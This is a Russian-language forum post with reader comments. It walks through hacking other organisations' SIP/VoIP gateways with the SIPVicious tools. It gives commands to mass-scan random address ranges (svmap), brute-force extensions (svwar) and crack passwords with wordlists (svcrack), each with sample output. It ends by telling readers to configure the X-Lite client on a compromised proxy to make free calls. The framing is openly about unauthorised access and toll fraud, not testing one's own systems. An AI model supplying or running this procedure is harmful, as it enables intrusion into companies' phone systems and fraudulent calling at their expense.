Со времен введения стандарта SIP (Session Initiation Protocol) разработанногo Хенингом Шулзри и Марком Хэндли в 1996 году, инфраструктура SIP разрослась и опутала весь мир своей сетью. SIP — один из протоколов, лежащих в основе VOIP.
SIP используется для передачи как голоса так и видео. Основные клиенты это физические, юридические лица и корпорации, которые испоьзуют SIP как для звонков по миру так и для внутренней связи. Синхронизация элементов SIP сети происходит на 5060 порту, либо на 5061 с использованием шифрования. SIP хост работает как прокси сервер, он принимает запросы от клиентов, обрабатывает и выполняет соответствующие действия. Для авторизации на SIP сервере используется пара логин/пароль, которые обычно имеют цифровое значение. А сам SIP хост выглядит как IP:5060
Чтобы воспользоватся прелестями этого протокола, вам необходимо обнаружить и хакнуть парочку шлюзов. Для этого вам понадобится пакет SIPVicious и интерпретатор Python. Либо дистрибутив Backrack в котором эти утилиты уже установлены.
Для поиска девайсов с открытым 5060 портом вам понадобится запустить утилиту svmap.py
Svmap умеет:
Определять SIP девайсы и PBX сервера на дефолтных/иных портах.
Сканировать большие диапазоны сетей.
Использовать несколько методов сканирования, а также может заставить зазвонить одновременно все обнаруженные девайсы.
Сканировать рандомные диапазоны адресов.
Пример запуска для сканирования
./svmap 1.1.1.1/24 — сканирует по заданной маске.
./svmap voip-kontora.org — сканирует заданный домайн.
./svmap 1.1.1.50-1.1.1.60 — сканирует заданный диапазон.
./svmap --randomize — сканирует произвольный диапазон который прога выбирает сама.
Итак, определились с диапазоном либо предоставили выбор утилите.
НА экране видим аутпут примерно следующего содержания:
./svmap 10.10.10.10/24
| SIP Device | User Agent |
— | 10.10.10.1:5060 | Asterisk PBX |[/B]
IP: port и название девайса.
Теперь вам нужно подобрать юзернеймы по кторым происходит авторизация на данном девайсе.
Для этого будем использовать утилиту svwar.py
Запускаете её следующим образом:
./svwar.py -e100-999999 10.10.10.1
Утилита методом брутфорса перебирает юзеров, и на выходе вы получаете следующую картину:
| Extension | Authentication |
— | 123 | reqauth |
| 100 | reqauth |
| 250 | noauth |
Где reqauth означает что для авторизации нужен пароль а noauth соответственно означает что пароль для авторизации не нужен — что встречается довольно часто. Но если пассворд все же нужен, то мы воспользуемся утилитой svcrack.py
Как я уже говорил пароль чаще всего имеет цифровое значение. Запустим утилиту:
./svcrack.py 10.10.10.1 -u 123
Флаг -u это юзернейм
На выходе получаем
| Extension | Password |
— | 123 | 999 |
Если пароль имеет буквенное значение, что встречается реже, но все же имеет место быть, мы можем использовать словарик дефолтных паролей. Для этого запустим утилиту с параметром -d
./svcrack.py 10.10.10.1 -u 123 -d wordlist.txt
И если вам повезло то вы уидите нечто в виде
| Extension | Password |
— | 123 | admin |
SIP очень распространен, практически каждая более менее большая компания использует IP телефонию, запустив svmap на ночь, утром вы обнаружите не одну сотню девайсов.
Для звонков через SIP можно испольовать клиент x-lite.
Настраиваем на сбрученный SIP прокси и радуемся жизни
Автор: v1skas
Подскажите,пожалуйста,как потом настроить X-lite , на имеющийся результат? Я понимаю , что никому это не надо , но всеже….,готов делится инфой тож. Icq 586538532
chuvak, esli port ne 5060, skanit’ ne budet ? kak vistavit’ drugie porti na scan